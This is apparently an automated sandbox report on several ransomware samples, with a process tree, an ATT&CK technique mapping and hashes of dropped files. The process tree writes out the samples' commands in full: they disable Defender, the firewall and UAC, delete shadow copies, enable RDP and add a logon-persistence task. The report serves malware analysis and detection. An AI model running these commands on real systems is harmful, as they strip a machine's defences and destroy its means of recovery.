                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "wuauserv" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:2080
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "WPCSvc" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:2424
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "MpsSvc" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:1304
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "wscsvc" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:2568
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "WinDefend" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:2940
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "WerSvc" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:1520
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "AdobeFlashPlayerUpdateSvc" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:484
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "SkypeUpdate" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:1780
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "idsvc" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:2776
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "CscService" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:2448
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "Spooler" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:2720
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "gupdate" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:620
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "gupdatem" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:840
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "SCardSvr" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:2492
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "BITS" start= disabled
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:912
                                                    • C:\Windows\SysWOW64\sc.exe
                                                      sc config "PlugPlay" start= auto
                                                      5⤵
                                                      • Launches sc.exe
                                                      PID:2736
                                                    • C:\Windows\SysWOW64\powercfg.exe
                                                      POWERCFG -Change -standby-timeout-ac 0
                                                      5⤵
                                                      • Power Settings
                                                      PID:2620
                                                    • C:\Windows\SysWOW64\powercfg.exe
                                                      POWERCFG -Change -monitor-timeout-ac 0
                                                      5⤵
                                                      • Power Settings
                                                      PID:1272
                                                    • C:\Windows\SysWOW64\reg.exe
                                                      reg delete "HKLM\SYSTEM\Remote Manipulator System" /f
                                                      5⤵
                                                        PID:2884
                                                      • C:\Windows\SysWOW64\reg.exe
                                                        REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer" /t Reg_sz /v SmartScreenEnabled /d off /f
                                                        5⤵
                                                          PID:2936
                                                        • C:\Windows\SysWOW64\reg.exe
                                                          REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /t Reg_sz /v SmartScreenEnabled /d off /f
                                                          5⤵
                                                            PID:2168
                                                          • C:\Windows\SysWOW64\reg.exe
                                                            REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v EnableLUA /d 0 /f
                                                            5⤵
                                                              PID:1640
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v EnableLUA /d 0 /f
                                                              5⤵
                                                                PID:2208
                                                              • C:\Windows\SysWOW64\reg.exe
                                                                REG ADD "HKCU\Software\Policies\Microsoft\Windows\System" /t Reg_dword /v DisableCMD /d 0 /f
                                                                5⤵
                                                                  PID:1988
                                                                • C:\Windows\SysWOW64\reg.exe
                                                                  REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /d 0 /f
                                                                  5⤵
                                                                    PID:580
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v Start /t REG_DWORD /d 0 /f
                                                                    5⤵
                                                                      PID:2896
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                      5⤵
                                                                        PID:2628
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v Start /t REG_DWORD /d 0 /f
                                                                        5⤵
                                                                          PID:2732
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile" /v EnableFirewall /t REG_DWORD /d 0 /f
                                                                          5⤵
                                                                            PID:1752
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess" /v Start /t REG_DWORD /d 2 /f
                                                                            5⤵
                                                                              PID:2192
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg add "HKLM\SOFTWARE\Microsoft\security center" /v AntiVirusDisableNotify /t REG_DWORD /d 1 /f
                                                                              5⤵
                                                                                PID:2228
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Microsoft\security center" /v AntiVirusOverride /t REG_DWORD /d 4 /f
                                                                                5⤵
                                                                                  PID:2224
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\SOFTWARE\Microsoft\security center" /v FirewallDisableNotify /t REG_DWORD /d 1 /f
                                                                                  5⤵
                                                                                    PID:544
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg add "HKLM\SOFTWARE\Microsoft\security center" /v FirewallOverride /t REG_DWORD /d 1 /f
                                                                                    5⤵
                                                                                      PID:2848
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg add "HKLM\SOFTWARE\Microsoft\security center" /v FirstRunDisabled /t REG_DWORD /d 1 /f
                                                                                      5⤵
                                                                                        PID:2360
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Microsoft\security center" /v UpdatesDisableNotify /t REG_DWORD /d 1 /f
                                                                                        5⤵
                                                                                          PID:2984
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
                                                                                          5⤵
                                                                                            PID:1992
                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                            sc start SysdService
                                                                                            5⤵
                                                                                            • Launches sc.exe
                                                                                            PID:928
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        cmd /c ""C:\ProgramData\del.bat""
                                                                                        3⤵
                                                                                          PID:2576
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +H +S /S /D "C:\ProgramData\WindowsDriverFoundation\*.*"
                                                                                            4⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:1956
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +H +S C:\ProgramData\WindowsDriverFoundation
                                                                                            4⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:892
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +H +S C:\ProgramData\softenza.bat
                                                                                            4⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:2536
                                                                                          • C:\Windows\SysWOW64\attrib.exe
                                                                                            attrib +H +S C:\ProgramData
                                                                                            4⤵
                                                                                            • Views/modifies file attributes
                                                                                            PID:1580
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          cmd /c ""C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.lise-3e900ee08033135cd072715760304e7596fd52ee1a48e13a582a1bb04ae488f4-selfdel.bat" "
                                                                                          3⤵
                                                                                            PID:2636
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\deldll.bat" "
                                                                                            3⤵
                                                                                              PID:2416
                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                ping -n 2 -w 1000 127.0.0.1
                                                                                                4⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                • Runs ping.exe
                                                                                                PID:2824
                                                                                          • C:\Users\Admin\Desktop\00348\Trojan-Ransom.Win32.SageCrypt.bfp-1f1d632a3baecaea7fefcfdf6af7191bbb18a4cd983ebf51a6b37c602971ee11.exe
                                                                                            Trojan-Ransom.Win32.SageCrypt.bfp-1f1d632a3baecaea7fefcfdf6af7191bbb18a4cd983ebf51a6b37c602971ee11.exe
                                                                                            2⤵
                                                                                            • Executes dropped EXE
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                            PID:2772
                                                                                            • C:\Users\Admin\Desktop\00348\Trojan-Ransom.Win32.SageCrypt.bfp-1f1d632a3baecaea7fefcfdf6af7191bbb18a4cd983ebf51a6b37c602971ee11.exe
                                                                                              "C:\Users\Admin\Desktop\00348\Trojan-Ransom.Win32.SageCrypt.bfp-1f1d632a3baecaea7fefcfdf6af7191bbb18a4cd983ebf51a6b37c602971ee11.exe" g
                                                                                              3⤵
                                                                                                PID:2872
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                "C:\Windows\System32\schtasks.exe" /CREATE /TN "N0mFUQoa" /TR "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" /SC ONLOGON /RL HIGHEST /F
                                                                                                3⤵
                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                PID:3016
                                                                                              • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe"
                                                                                                3⤵
                                                                                                  PID:2384
                                                                                                  • C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe
                                                                                                    "C:\Users\Admin\AppData\Roaming\Rj3fNWF3.exe" g
                                                                                                    4⤵
                                                                                                      PID:2704
                                                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                      4⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:2096
                                                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                      4⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:1664
                                                                                                    • C:\Windows\SysWOW64\vssadmin.exe
                                                                                                      "C:\Windows\System32\vssadmin.exe" delete shadows /all /quiet
                                                                                                      4⤵
                                                                                                      • Interacts with shadow copies
                                                                                                      PID:2188
                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                      4⤵
                                                                                                        PID:3048
                                                                                                      • C:\Windows\SysWOW64\WScript.exe
                                                                                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f1.vbs"
                                                                                                        4⤵
                                                                                                          PID:1548
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\__config252888.bat"
                                                                                                        3⤵
                                                                                                          PID:1032
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            ping 127.0.0.1 -n 2
                                                                                                            4⤵
                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                            • Runs ping.exe
                                                                                                            PID:968
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            ping 127.0.0.1 -n 2
                                                                                                            4⤵
                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                            • Runs ping.exe
                                                                                                            PID:3052
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            ping 127.0.0.1 -n 2
                                                                                                            4⤵
                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                            • Runs ping.exe
                                                                                                            PID:3044
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            ping 127.0.0.1 -n 2
                                                                                                            4⤵
                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                            • Runs ping.exe
                                                                                                            PID:2780
                                                                                                      • C:\Users\Admin\Desktop\00348\Trojan-Ransom.Win32.Shade.pem-f312f5fea266a224e31e24dd5d09bab69bf225eea8e9daef954aa8b5078ad3cd.exe
                                                                                                        Trojan-Ransom.Win32.Shade.pem-f312f5fea266a224e31e24dd5d09bab69bf225eea8e9daef954aa8b5078ad3cd.exe
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                        • Suspicious use of UnmapMainImage
                                                                                                        PID:2816
                                                                                                      • C:\Users\Admin\Desktop\00348\VHO-Trojan-Ransom.Win32.Convagent.gen-de5aefd24ae1f5a39593f316e8cc39817d6bf67a6c0d7d9a25d26d4aa7927feb.exe
                                                                                                        VHO-Trojan-Ransom.Win32.Convagent.gen-de5aefd24ae1f5a39593f316e8cc39817d6bf67a6c0d7d9a25d26d4aa7927feb.exe
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Loads dropped DLL
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                                                        PID:2760
                                                                                                        • C:\Program Files\ShnSoft\ACR122Uд¿¨Èí¼þT\ICtool.exe
                                                                                                          "C:\Program Files\ShnSoft\ACR122Uд¿¨Èí¼þT\ICtool.exe"
                                                                                                          3⤵
                                                                                                            PID:1496
                                                                                                      • C:\Windows\system32\vssvc.exe
                                                                                                        C:\Windows\system32\vssvc.exe
                                                                                                        1⤵
                                                                                                          PID:1924
                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\!HELP_SOS.hta"
                                                                                                          1⤵
                                                                                                            PID:836
                                                                                                          • C:\Windows\SysWOW64\DllHost.exe
                                                                                                            C:\Windows\SysWOW64\DllHost.exe /Processid:{3F6B5E16-092A-41ED-930B-0B4125D91D4E}
                                                                                                            1⤵
                                                                                                              PID:1512
                                                                                                            • C:\Windows\system32\AUDIODG.EXE
                                                                                                              C:\Windows\system32\AUDIODG.EXE 0x1c0
                                                                                                              1⤵
                                                                                                                PID:1784
                                                                                                              • C:\ProgramData\WindowsDriverFoundation\mqsvcss.exe
                                                                                                                C:\ProgramData\WindowsDriverFoundation\mqsvcss.exe
                                                                                                                1⤵
                                                                                                                  PID:956
                                                                                                                  • C:\ProgramData\WindowsDriverFoundation\mqssclient.exe
                                                                                                                    C:\ProgramData\WindowsDriverFoundation\mqssclient.exe
                                                                                                                    2⤵
                                                                                                                      PID:2612
                                                                                                                      • C:\ProgramData\WindowsDriverFoundation\mqssclient.exe
                                                                                                                        C:\ProgramData\WindowsDriverFoundation\mqssclient.exe /tray
                                                                                                                        3⤵
                                                                                                                          PID:1776
                                                                                                                      • C:\ProgramData\WindowsDriverFoundation\mqssclient.exe
                                                                                                                        C:\ProgramData\WindowsDriverFoundation\mqssclient.exe /tray
                                                                                                                        2⤵
                                                                                                                          PID:1772

                                                                                                                      Network

                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                      Reconnaissance

                                                                                                                      Resource Development

                                                                                                                      Initial Access

                                                                                                                      Execution

                                                                                                                      Command and Scripting Interpreter

                                                                                                                      1
                                                                                                                      T1059

                                                                                                                      Scheduled Task/Job

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053.005

                                                                                                                      System Services

                                                                                                                      2
                                                                                                                      T1569

                                                                                                                      Service Execution

                                                                                                                      2
                                                                                                                      T1569.002

                                                                                                                      Windows Management Instrumentation

                                                                                                                      1
                                                                                                                      T1047

                                                                                                                      Persistence

                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                      1
                                                                                                                      T1547

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      1
                                                                                                                      T1547.001

                                                                                                                      Create or Modify System Process

                                                                                                                      2
                                                                                                                      T1543

                                                                                                                      Windows Service

                                                                                                                      2
                                                                                                                      T1543.003

                                                                                                                      Power Settings

                                                                                                                      1
                                                                                                                      T1653

                                                                                                                      Scheduled Task/Job

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053.005

                                                                                                                      Privilege Escalation

                                                                                                                      Boot or Logon Autostart Execution

                                                                                                                      1
                                                                                                                      T1547

                                                                                                                      Registry Run Keys / Startup Folder

                                                                                                                      1
                                                                                                                      T1547.001

                                                                                                                      Create or Modify System Process

                                                                                                                      2
                                                                                                                      T1543

                                                                                                                      Windows Service

                                                                                                                      2
                                                                                                                      T1543.003

                                                                                                                      Scheduled Task/Job

                                                                                                                      1
                                                                                                                      T1053

                                                                                                                      Scheduled Task

                                                                                                                      1
                                                                                                                      T1053.005

                                                                                                                      Defense Evasion

                                                                                                                      Direct Volume Access

                                                                                                                      1
                                                                                                                      T1006

                                                                                                                      Hide Artifacts

                                                                                                                      1
                                                                                                                      T1564

                                                                                                                      Hidden Files and Directories

                                                                                                                      1
                                                                                                                      T1564.001

                                                                                                                      Indicator Removal

                                                                                                                      2
                                                                                                                      T1070

                                                                                                                      File Deletion

                                                                                                                      2
                                                                                                                      T1070.004

                                                                                                                      Modify Registry

                                                                                                                      1
                                                                                                                      T1112

                                                                                                                      Credential Access

                                                                                                                      Discovery

                                                                                                                      Network Service Discovery

                                                                                                                      2
                                                                                                                      T1046

                                                                                                                      Network Share Discovery

                                                                                                                      1
                                                                                                                      T1135

                                                                                                                      Process Discovery

                                                                                                                      1
                                                                                                                      T1057

                                                                                                                      Remote System Discovery

                                                                                                                      1
                                                                                                                      T1018

                                                                                                                      System Information Discovery

                                                                                                                      2
                                                                                                                      T1082

                                                                                                                      System Location Discovery

                                                                                                                      1
                                                                                                                      T1614

                                                                                                                      System Language Discovery

                                                                                                                      1
                                                                                                                      T1614.001

                                                                                                                      System Network Configuration Discovery

                                                                                                                      1
                                                                                                                      T1016

                                                                                                                      Internet Connection Discovery

                                                                                                                      1
                                                                                                                      T1016.001

                                                                                                                      Lateral Movement

                                                                                                                      Collection

                                                                                                                      Command and Control

                                                                                                                      Exfiltration

                                                                                                                      Impact

                                                                                                                      Inhibit System Recovery

                                                                                                                      2
                                                                                                                      T1490

                                                                                                                      Service Stop

                                                                                                                      1
                                                                                                                      T1489

                                                                                                                      Replay Monitor

                                                                                                                      Loading Replay Monitor...

                                                                                                                      Downloads

                                                                                                                      • C:\Program Files\ShnSoft\ACR122Uд¿¨Èí¼þT\ICtool.exe.config
                                                                                                                        Filesize

                                                                                                                        898B

                                                                                                                        MD5

                                                                                                                        5be20268ebc06471686a5abfe66d3e8c

                                                                                                                        SHA1

                                                                                                                        63f1df1ac1e52b549eaf3d1237680aadd8b06fd9

                                                                                                                        SHA256

                                                                                                                        54d4c53c29830a2808d00e4dc53b7fec5e642cecf2ab489e69f7775dfc0960f9

                                                                                                                        SHA512

                                                                                                                        44f14bf5c6c0781905dd3fbecfed275adf695f9b6852b68789a7a8f04781701d989c4ef9a2801f46bc5db0794a2625d2e58eec3f75b05c379fc17887aa6fd6f8

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\WindowsDriverFoundation\mqssclient.exe
                                                                                                                        Filesize

                                                                                                                        1.5MB

                                                                                                                        MD5

                                                                                                                        7e5ba2b7f032c4957e43a6d4a3e0c6ec

                                                                                                                        SHA1

                                                                                                                        0ce6248a944df911881bd0e77127a9dda26fb948

                                                                                                                        SHA256

                                                                                                                        bf0e8543d2edaa5782991ce70f83b87eb4f69fe8f5ee55603973e5d5e32ebb15

                                                                                                                        SHA512

                                                                                                                        0e2dbdbd4ed9828f891292f60d439c6694e04c19d0cd919ff44bb2f1c12fa3cf1924913cc431f0f6bcfd0a04d7499321d71a2edc9204dd54612911730a21111b

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\WindowsDriverFoundation\mqsvcss.exe
                                                                                                                        Filesize

                                                                                                                        6.1MB

                                                                                                                        MD5

                                                                                                                        49ec0a4c7f464caabe8f898a2f700a3a

                                                                                                                        SHA1

                                                                                                                        efa5e2a786d59a4071db204655cc3127c9187593

                                                                                                                        SHA256

                                                                                                                        2e2f4f7aa23daadd0996406ab7f98cc78b36f2714436e845d737b7b2ec2a05a4

                                                                                                                        SHA512

                                                                                                                        142104c598aa33d4ae564c805e817bb7775f39ebd01d6c679e0003984132cf7ace73cac456a9b3d2a980a31ab17f996949b84a53af31f48157e7de9bd9437ed9

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\WindowsDriverFoundation\vp8decoder.dll
                                                                                                                        Filesize

                                                                                                                        155KB

                                                                                                                        MD5

                                                                                                                        0af6ecf8be943a10a75af3ff8f5bc798

                                                                                                                        SHA1

                                                                                                                        6b419023634c0e3ac33c761c1a3898f1512edb13

                                                                                                                        SHA256

                                                                                                                        6a11ff964b8cac59166a0da326dde38c16482710a25871419b25aa03c82888ee

                                                                                                                        SHA512

                                                                                                                        4d89d8372d27d4c9a5882848f1541b16930c8db1e2ee3e420b9f40f7277adc1abae304a95d2e7db641b69e30ce9fe83519d3238610bd4931ff364380bda80e12

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\WindowsDriverFoundation\vp8encoder.dll
                                                                                                                        Filesize

                                                                                                                        593KB

                                                                                                                        MD5

                                                                                                                        6fec7b74e3dd5e34d51a285c553ea75d

                                                                                                                        SHA1

                                                                                                                        26d51c65211ee4a2a7be2c18234a20e33cc0817e

                                                                                                                        SHA256

                                                                                                                        ece149241d87c2a6fb82065cb2dec2de9e2aef9081783f3073ca525073a4a75b

                                                                                                                        SHA512

                                                                                                                        0eba03c7d38cd415473c7754dd76c3375f4bf9b2ccd722762b3a50d87e276acc2a2e7d938afeb23f17b14b90a2458360420d291ad287ee016ff5f7d4b902010c

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\WindowsDriverFoundation\webmvorbisdecoder.dll
                                                                                                                        Filesize

                                                                                                                        169KB

                                                                                                                        MD5

                                                                                                                        d66f9c95b6d748b918756b92ebb11a57

                                                                                                                        SHA1

                                                                                                                        0208e2bb85b5aa0427318d107abcaa49e19fbf64

                                                                                                                        SHA256

                                                                                                                        b07eb51e4ae89fe1b9e49dd359288d92207aa00de92c8e26af09c9e4b7fa7863

                                                                                                                        SHA512

                                                                                                                        ec6c02ff1efc5d639b12da9229edd4f24fbcec3068df2a2d03aa33ac7082618905d4eb0aae6641d16d36f877a28e9066dbce6551ca820928029c61e3ed421a2c

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\WindowsDriverFoundation\webmvorbisencoder.dll
                                                                                                                        Filesize

                                                                                                                        258KB

                                                                                                                        MD5

                                                                                                                        b8910d83b950769824b5ce02d1b8185b

                                                                                                                        SHA1

                                                                                                                        01a81dba23502ab21eece0a59401532a8c2d33a9

                                                                                                                        SHA256

                                                                                                                        fd9a3ab60efe87693e1491280acb2e98bb81d2b1cb013ebef92204bba7c6f3a7

                                                                                                                        SHA512

                                                                                                                        70d4d73f245ad5ba25ade385368e24c5168b3d6b2929cf4d3fe759bc607dd417d14119ffdcaf71075544ad39a8fb6e522074e7ac6b832c4bace92cfee62697d0

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\del.bat
                                                                                                                        Filesize

                                                                                                                        212B

                                                                                                                        MD5

                                                                                                                        36943d266fd34ba1d44c30137f327ada

                                                                                                                        SHA1

                                                                                                                        689e681b6409621a023591f488fc3b3bfa69420f

                                                                                                                        SHA256

                                                                                                                        41d739d407b25ca82050dea877b8166ad7d18b38097f3b9987165b74aa68b8ac

                                                                                                                        SHA512

                                                                                                                        d1052ca5f795a145d7adc59d82c2e744bce5c6c0fdc4dc823fc60720bea7bfac03878361e596ee4774cf26ef97abf3ef3ee2648b90c496559c905ec3c79e1235

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\id.txt
                                                                                                                        Filesize

                                                                                                                        340B

                                                                                                                        MD5

                                                                                                                        47abf04d5f9d010f7444b742edaf4cce

                                                                                                                        SHA1

                                                                                                                        b9519d1aa633d4e965b57bbf74ec7a5a901156b3

                                                                                                                        SHA256

                                                                                                                        3ef25214a811673f657333f26454cd3ba510cf3843533a6b8cf95379414fd0c0

                                                                                                                        SHA512

                                                                                                                        51feba699a87e1da83ce9f15a72e884b7c693b9c3ccd6f60c79b0f4794940b427f467ae485a3f7a12ed7b30aeef665f0ece55e6a65df86d7083bbafea4c48e7e

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\id.txt
                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        3865177f99b6a4f6b1e0bd8a52ed6856

                                                                                                                        SHA1

                                                                                                                        90f8f08c00b90fec8e095ad0a3672bfd4afa8178

                                                                                                                        SHA256

                                                                                                                        aff433546164fe04b2783ffcaa410ab7930c2a6e2a906f1891c7398af57bacd6

                                                                                                                        SHA512

                                                                                                                        937075bb1860b88f1ba7b2ee1eecfa796e09053df76ae5e59b2340b08dc47f2d0cefa99476e2e2b02c5c47c60ce00de257f72636980b32084693ef9bd7d0b9b6

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\red\203.reg
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                        MD5

                                                                                                                        9613f45c1f227d785c889dadcfe054fe

                                                                                                                        SHA1

                                                                                                                        d7f9cde47ee0a634be9b0506f2211f48791e0d48

                                                                                                                        SHA256

                                                                                                                        326c424d1df5cf1ee9316d7e557a04f438dad6af19048709f39fbf1303f70d44

                                                                                                                        SHA512

                                                                                                                        4f5c574b8651f95d4e47401c9235134eadbe66eb860e0bbee9e125fa896a5472cf1c0791d392cd500ba9b78a52f8b262c7c7b969bf758a73bc805848a21ffe5e

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\red\205.reg
                                                                                                                        Filesize

                                                                                                                        32KB

                                                                                                                        MD5

                                                                                                                        7d4ac22607ed1242460566697f3955c7

                                                                                                                        SHA1

                                                                                                                        3443c88710720b9500d3224f38968581d0a6818b

                                                                                                                        SHA256

                                                                                                                        3d2d707d0afd9d4ebe0aee2a5ed78fa9c36017973494fa54f9516aa9b9a2602d

                                                                                                                        SHA512

                                                                                                                        84832e677485454a52e30fcb928d61c135a25ad97c0a5e1f2eecf0e958d94b283cd3db6b5e78a2d21d9771848d312a0841cb6746e35ab172af2d5c3fc0b9c9b0

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\send.vbs
                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        0a1802235751f97a0ee0df17fc26adae

                                                                                                                        SHA1

                                                                                                                        319384158fd8394131ab338011cd970f2b7eb37e

                                                                                                                        SHA256

                                                                                                                        507475ae8853b6cf3b06c7234c9376e17de2c87c463d3d9f5dbf604c49553e52

                                                                                                                        SHA512

                                                                                                                        f3ca0c5549b92a35a76bf33880cbe6ec5b7ef73b76ba905750a09e959f4ac7665f9b82a1b9a8ee73585b9fca6d9d3274fb6ce052fbec785e435701e28c8d67c9

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\setu.bat
                                                                                                                        Filesize

                                                                                                                        7KB

                                                                                                                        MD5

                                                                                                                        aa6094f6ea64aca03fcce732ddc721ad

                                                                                                                        SHA1

                                                                                                                        ee1accd858a7930e03d1159173b394ae40fb0369

                                                                                                                        SHA256

                                                                                                                        04085e91b33f28dd6153ac1e8ab186e4197835ef96f0f63aa3bc50f67bd8bc2b

                                                                                                                        SHA512

                                                                                                                        818bb9c6be370c86a803abe940377da4575756d2bffb4753de912a404bd0398f9d1c0f73781d5dfd68ac05baeff1838d5a687e89d637cd67721251946f7f7ad4

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\setu.vbs
                                                                                                                        Filesize

                                                                                                                        135B

                                                                                                                        MD5

                                                                                                                        aed49ba2c01ec6ab7e87a012a83fc7cf

                                                                                                                        SHA1

                                                                                                                        f58ed447a7df083f471630042c181988b2cdc6cc

                                                                                                                        SHA256

                                                                                                                        fc9af83c2a8277cec18b4a4cdc728426f4fed0893b68421d84d679933c66d6c5

                                                                                                                        SHA512

                                                                                                                        ab90f81fd66a2882870304aac5abf6278e67db8091fd5fc7cadcc755b3da8009bf2f26878694b034fada6e8912de991654dc52a3923a7014f17c897b9979238a

                                                                                                                        Download Submit

                                                                                                                      • C:\ProgramData\softenza.bat
                                                                                                                        Filesize

                                                                                                                        1KB

                                                                                                                        MD5

                                                                                                                        e44e6d2cadb22f25ee76829dfd1c003b

                                                                                                                        SHA1

                                                                                                                        ab0d1f20781ebc4ef7e9a10d62f56dcdaf3c8eec

